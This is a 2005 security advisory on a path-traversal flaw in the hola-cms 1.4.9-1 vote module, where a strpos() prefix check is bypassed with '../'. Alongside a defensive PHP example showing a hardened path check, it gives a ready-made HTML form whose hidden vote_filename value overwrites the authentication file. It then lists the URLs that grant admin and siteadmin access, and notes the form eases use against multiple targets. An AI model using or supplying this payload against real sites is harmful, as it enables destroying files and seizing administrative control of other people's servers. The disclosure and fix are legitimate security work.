Virginity Security Advisory 2005-002
DATE : 2005-03-13 15:11 GMT
TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
AUTHOR : Virginity
ADVISORY NUMBER : 004
Like the one in SA-2005-001: A new patched version 1.4.9-1 got released where that issue was marked as solved. The Vote-Module (vote_save_results.php) now checks with strpos() whether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.
BUT! Since we all know how to change directories by typing ../ we can still manipulate or destroy every file on the whole server by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!! Below is the updated example of how to destroy the login-authentication file and gain access to admin-functions!
Really sad that the quick patch (released 3? hours after notification) doesn't really work.
Author of the Software has been notified.
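The root of the problem is that a string prefix test says nothing about where the path ends up after "../" is resolved. The following is an added illustration, not hola-cms code: the weak function reconstructs the check as the advisory describes it (the project's exact source is not shown here), and the hardened one keeps only the last path component, allows a conservative name pattern, and builds the path from a fixed votes directory; the ".txt" extension and the directory name are assumptions for the example.

```php
<?php
// Added example, not code from hola-cms. The weak check reconstructs the
// strpos() test described in the advisory; the real project code is not on
// this page.

// Weak: a prefix test on the raw string. "holaDB/votes/../../x" passes.
function vote_path_weak(string $vote_filename): ?string {
    if (strpos($vote_filename, "holaDB/votes") !== 0) {
        return null;
    }
    return $vote_filename;
}

// Hardened: ignore any directory part the client sent (basename() drops
// "../" and "/"), allow only a simple file name pattern, and join it onto a
// server-side votes directory that the client cannot influence.
// The ".txt" extension is an assumption for this example.
function vote_path_safe(string $vote_filename, string $votes_dir): ?string {
    $name = basename($vote_filename);
    if (!preg_match('/^[A-Za-z0-9_-]+\.txt$/', $name)) {
        return null;
    }
    $base = realpath($votes_dir);
    if ($base === false) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . $name;
}

// Constructed inputs: a legitimate vote file and the traversal from the advisory.
$inputs = [
    "holaDB/votes/poll1.txt",
    "holaDB/votes/../../admin/multiuser/multiuser.php",
];
foreach ($inputs as $in) {
    printf("%-52s weak accepts: %-5s safe accepts: %s\n", $in,
        var_export(vote_path_weak($in) !== null, true),
        var_export(vote_path_safe($in, __DIR__) !== null, true));
}
```

The second input is accepted by the prefix check and rejected by the hardened function, which never uses the client-supplied directory part at all.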
Create this html form (that makes it easier to use it on multiple targets):
<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>
Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button the first lines of multiuser.php (which includes the authentication mechanism) get overwritten, and by calling http://[target]/admin/index_cms.php you have access to all user functions. By calling http://[target]/admin/[module you want].php?username=siteadmin you have access to all siteadmin functions!
Use another CMS... I think PHP-Nuke isn't that vulnerable ;)
YES! The girl did it again :) Contact me on IRC!